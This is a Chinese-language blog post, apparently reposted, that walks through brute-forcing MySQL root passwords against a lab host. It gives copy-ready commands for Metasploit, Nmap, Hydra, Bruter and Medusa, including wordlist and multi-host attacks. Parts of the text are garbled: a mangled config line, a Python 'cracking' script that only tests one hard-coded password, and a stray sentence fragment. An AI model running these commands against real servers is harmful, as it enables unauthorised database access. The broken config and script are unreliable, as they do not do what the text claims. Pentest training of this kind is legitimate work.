本文共 2320 字,大约阅读时间需要 7 分钟。
在信息安全领域,MySQL数据库的安全性是一个重要的防护点。通常情况下,数据库不会提供对外连接,严格的安全设置会限制仅允许从特定IP或本机登录。然而,渗透测试的核心在于发现这些例外。为了提高渗透测试效率,本文将基于现有的主流MySQL口令扫描工具,提供实际操作场景的具体命令和步骤。
为了允许远程访问,将 MySQL 的 host 设置为 %,并设置默认口令为 11111111。
my.ini): [mysql]bind-address = *
Metasploit 是一款功能强大的渗透测试框架,支持多种数据库扫描模块。
在 Kali Linux 终端中运行:
msfconsole
use auxiliary/scanner/mysql/mysql_loginset rhosts 192.168.157.130set username rootset password 11111111run
use auxiliary/scanner/mysql/mysql_loginset RHOSTS 192.168.157.130set pass_file "/root/top10000pwd.txt"set username rootrun
扫描结果将显示绿色 + 符号表示成功破解的口令,红色 - 表示未成功。
Nmap 是一款多功能网络扫描工具,支持 MySQL 相关脚本。
####MySQL 脚本示例查看 Nmap 的 MySQL 脚本路径:
ls /usr/share/nmap/scripts/mysql*
nmap -p 3306 --script=mysql-empty-password.nse 192.168.157.130
nmap -sV --script=mysql-databases --script-args dbuser=root,dbpass=11111111 192.168.157.130
Hydra 是一款功能强大的密码暴力破解工具,支持 MySQL 协议。
xhydra-gtk
hydra -l root -p 11111111 -t 16 192.168.157.130 mysql
hydra -l root -P /root/top10000pwd.txt -t 16 192.168.157.130 mysql
Bruter 是一款支持多种协议的暴力破解工具,简单易用。
brute -l root -p 11111111 -t 16 192.168.157.130
brute -l root -P /root/top10000pwd.txt -t 16 192.168.157.130
Medusa 是一款支持并行破解的高效工具,适合大规模攻击。
medusa -M mysql -h 192.168.157.130 -e ns -F -u root -P /root/top10000pwd.txt
medusa -M mysql -H host.txt -e ns -F -u root -P /root/top10000pwd.txt
编写一个简单的 Python 脚本进行 MySQL 破解:
import MySQLdb# 例如:破解本地数据库db = MySQLdb.connect(host="localhost", user="root", passwd="11111111")print("用户名:root,密码:11111111")db.close() RHOSTS 或 H 参数。通过以上方法,可以有效地测试和破解 MySQL 数据库的口令。实际操作中,结合目标环境和风险评估,灵活选择最适合的工具和参数。
转载地址:http://nfgc.baihongyu.com/